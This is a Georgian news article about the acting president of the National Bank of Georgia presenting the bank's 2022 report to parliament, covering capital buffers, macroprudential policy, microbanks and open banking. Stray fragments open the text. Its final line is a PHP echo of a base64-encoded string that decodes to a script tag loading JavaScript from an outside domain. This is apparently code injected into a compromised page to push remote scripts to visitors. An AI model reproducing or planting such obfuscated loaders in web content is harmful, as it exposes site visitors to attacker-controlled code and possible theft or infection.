celsiusi
ავერსი შნაიდერი

ფინანსური სტაბილურობის ხელშეწყობა ძალიან მნიშვნელოვანი ამოცანაა ეროვნული ბანკისთვის, რადგან ის აუცილებელია გრძელვადიანი მდგრადი ეკონომიკური ზრდისათვის, – ამის შესახებ საქართველოს ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელმა, არჩილ მესტვირიშვილმა პარლამენტის პლენარულ სხდომაზე საქართველოს ეროვნული ბანკის 2022 წლის ანგარიშის წარადგენისას განაცხადა.

„ამ კუთხით, 2022 წელს, ნოემბრის სხდომაზე ჩვენ გადავხედეთ კონტრციკლურ ბუფერს და მივიღეთ გადაწყვეტილება, რომ გაზრდილიყო, მიმდინარე წლის დასაწყისში გავზარდეთ ერთი პროცენტული პუნქტით. ასევე, ვაკვირდებოდით, განსაკუთრებით უძრავი ქონების ბაზარზე მიმდინარე ტენდენციებს, რომ ამას მომავალში ფინანსური სტაბილურობის რისკები არ შეექმნა ჩვენი საბანკო სექტორისათვის. 2019 წლიდან მოყოლებული, განსაკუთრებით აქტიურად ვიყენებდით მაკროპრუდენციულ ინსტრუმენტებს, რაც დაგვეხმარა, რომ ჯერ პანდემიიდან გამოწვეული შოკი და შემდეგ უკვე რუსეთ-უკრაინის ომიდან გამოწვეული შოკი საბანკო სექტორს მარტივად გადაეტანა. მათ შორის, საშუალება მისცა, რომ ბუფერები შეგვევსო. ჩვენ გასული წლის პანდემიის დროს მივეცით ბანკებს საშუალება რომ კაპიტალის ბუფერები გამოეყენებინათ და 2022 წელს თითქმის ყველა ბანკმა აღადგინა მანამდე გამოყენებული კაპიტალის ბუფერები“, – განაცხადა არჩილ მესტვირიშვილმა.

მისი თქმით, საბანკო სექტორი 2022 წლის ბოლოსაც კარგად კაპიტალიზებული და ლიკვიდური იყო, ასევე შემცირების ტრენდი ჰქონდა, რომელიც ახლაც გაგრძელდა საბანკო სექტორში უმოქმედო სესხებზე.

„აღსანიშნავია, რომ 2022 წელს ჩვენ განვაახლეთ საზედამხედველო პოლიტიკის სტრატეგია და განსაკუთრებულ ყურადღებას ვაქცევთ საბანკო სექტორში კონკურენციის ზრდას. ამ კუთხით რამდენიმე ნაბიჯი იყო გადადგმული პარლამენტთან ერთად. კერძოდ, დამტკიცდა „მიკრობანკების საქმიანობის შესახებ“ კანონი, ჩვენ წელს უკვე გარკვეული ნორმატიული აქტების მიღების პროცესში ვართ და იმედი გვაქვს, რომ მიკრობანკები გაჩნდებიან ბაზარზე და საბანკო სექტორში დამატებით კონკურენციას შემოიტანენ. ასევე, გვაქვს ღია ბანკინგის პროექტი, რაც იძლევა საშუალებას, რომ არასაბანკო მონაწილეებს ჰქონდეთ წვდომა ბანკში არსებულ ინფორმაციაზე, მათ შორის კლიენტის თანხმობის შემთხვევაში, ჰქონდეთ წვდომა კლიენტის ანგარიშებზე და სხვადასხვა სერვისი კლიენტს შესთავაზონ უკვე ფინტექ კომპანიებმა, რაც ასევე დამატებით კონკურენციას ქმნის საბანკო სექტორში “,- განაცხადა სებ-ის პრეზიდენტის მოვალეობის შემსრულებელმა.

362
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");